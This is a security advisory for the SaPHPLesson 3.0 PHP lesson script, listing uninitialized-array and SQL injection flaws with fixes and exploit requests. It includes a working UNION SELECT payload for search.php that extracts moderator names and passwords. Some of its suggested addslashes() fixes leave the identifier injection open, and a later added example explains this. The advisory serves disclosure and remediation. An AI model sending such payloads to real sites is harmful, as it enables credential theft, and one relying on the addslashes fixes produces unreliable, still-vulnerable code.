
SaPHPLesson 3.0 Multbugs



SaPHPLesson 3.0 Multbugs By :-- D3vil-0x1 | Devil-00 --:

	1- Unfiltered array

	Filename	:- show.php
	Line		:- 102

[code]
$hrow[] = $Row2;[/code]

	The array is appended to without being initialized first, so a request parameter with the same name can set it beforehand when request variables are imported as globals (for example with register_globals enabled).

Fix :-

	Add this code at line [ 11 ] of /show.php :-

	We add the code at global scope to fix every unfiltered variable in the code :)

[code]
$hrow = array();[/code]

Exploit :-

	GET ^
		/lessons/show.php?lessid=1&hrow=D3vil-0x1

/---------------------------------------------------------/

	2- Unfiltered array

	Filename	:- showcat.php
	Line		:- 80

[code]
$Lsnrow[] = $Row;[/code]

Fix :-

	Add this code at line [ 11 ] of /showcat.php :-

	We add the code at global scope to fix every unfiltered variable in the code :)

[code]
$Lsnrow = array();[/code]

Exploit :-

	GET ^

		/lessons/showcat.php?forumid=1&Lsnrow=D3vil-0x1

/---------------------------------------------------------/

	3- SQL Injection

	Filename	:- search.php
	Line		:- Multiple lines

Fix :-

	Replace line 28 with

[code]
$Sql = "select * from less,forums where less.Hidden!=1 and BINARY less.".addslashes($Find)." REGEXP'$Word' and forums.id=less.forumno order by ".addslashes($Order)." ".addslashes($Trteb)."";[/code]

	Replace line 32 with

[code]
$Sql = "select * from less,forums where less.Hidden!=1 and BINARY less.$Find REGEXP'%$Word%' and less.forumno='".addslashes($Cat)."' and forums.id=less.forumno order by ".addslashes($Order)." ".addslashes($Trteb)."";[/code]

Exploit :-

	POST ^

		Word=a&Find=lesstitle UNION ALL SELECT null,null,null,ModName,null,null,null,null,ModPassword,null,null,null,null,null,null,null,null,null,null,null FROM modretor/*&Cat=All&Order=lessid&Trteb=DESC

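Added example (not part of the original advisory and not SaPHPLesson's own code): $Find, $Order and $Trteb sit in identifier position, outside any quotes, and addslashes() only escapes quote, backslash and NUL characters, so a value without those characters passes through it unchanged. The sketch below checks those three inputs against allowlists and binds Word and Cat as parameters; the allowlist entries, the helper names pick() and build_search(), and the meaning of Cat=All are assumptions.

```php
<?php
// Added example, not SaPHPLesson code. Allowlist entries are assumptions:
// only lesstitle and lessid are named in the advisory.
const FIND_COLUMNS  = ['lesstitle'];
const ORDER_COLUMNS = ['lessid', 'lesstitle'];

// Return $value only if it is exactly one of the known identifiers.
function pick($value, array $allowed, string $default): string
{
    return (is_string($value) && in_array($value, $allowed, true)) ? $value : $default;
}

// Build the search query: identifiers come from allowlists, values are bound.
function build_search(array $in): array
{
    $find  = pick($in['Find']  ?? null, FIND_COLUMNS,  'lesstitle');
    $order = pick($in['Order'] ?? null, ORDER_COLUMNS, 'lessid');
    $dir   = pick($in['Trteb'] ?? null, ['ASC', 'DESC'], 'DESC');
    $word  = is_string($in['Word'] ?? null) ? $in['Word'] : '';
    $cat   = $in['Cat'] ?? 'All';

    $sql    = "select * from less,forums where less.Hidden!=1"
            . " and BINARY less.$find REGEXP ?";
    $params = [$word];
    if ($cat !== 'All') {            // assumed: 'All' means no category filter
        $sql     .= " and less.forumno = ?";
        $params[] = is_scalar($cat) ? (int)$cat : 0;
    }
    $sql .= " and forums.id=less.forumno order by $order $dir";
    return [$sql, $params];
}

// Constructed input: the Find value carries extra SQL and no quote characters.
$in = ['Word' => 'a', 'Find' => 'lesstitle UNION ALL SELECT 1/*',
       'Cat' => 'All', 'Order' => 'lessid', 'Trteb' => 'DESC'];

// addslashes() has nothing to escape in this value, so it comes back unchanged.
var_dump(addslashes($in['Find']) === $in['Find']);

[$sql, $params] = build_search($in);
echo $sql, "\n";
print_r($params);
// With a PDO handle: $stmt = $pdo->prepare($sql); $stmt->execute($params);
```

The pattern in Word is still chosen by the user; binding it only keeps it from altering the SQL statement.
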
/---------------------------------------------------------/

	4- SQL Injection

	Filename	:- misc.php
	Line		:- 64

Fix :-
	Replace lines 62 & 63 with this code

[code]
$LID  = intval($_GET["LID"]);
$Rate = intval($_POST["Rate"]);[/code]

/---------------------------------------------------------/

	5- Unfiltered array

	Filename	:- index.php
	Line		:- 24

[code]
$rows[] = $Row;[/code]

Fix :-

	Add this code at line [ 11 ] of /index.php :-

	We add the code at global scope to fix every unfiltered variable in the code :)

[code]
$rows = array();
$hrow = array();[/code]

Exploit :-

	GET ^

		/saphplesson/index.php?rows=D3vil-x01
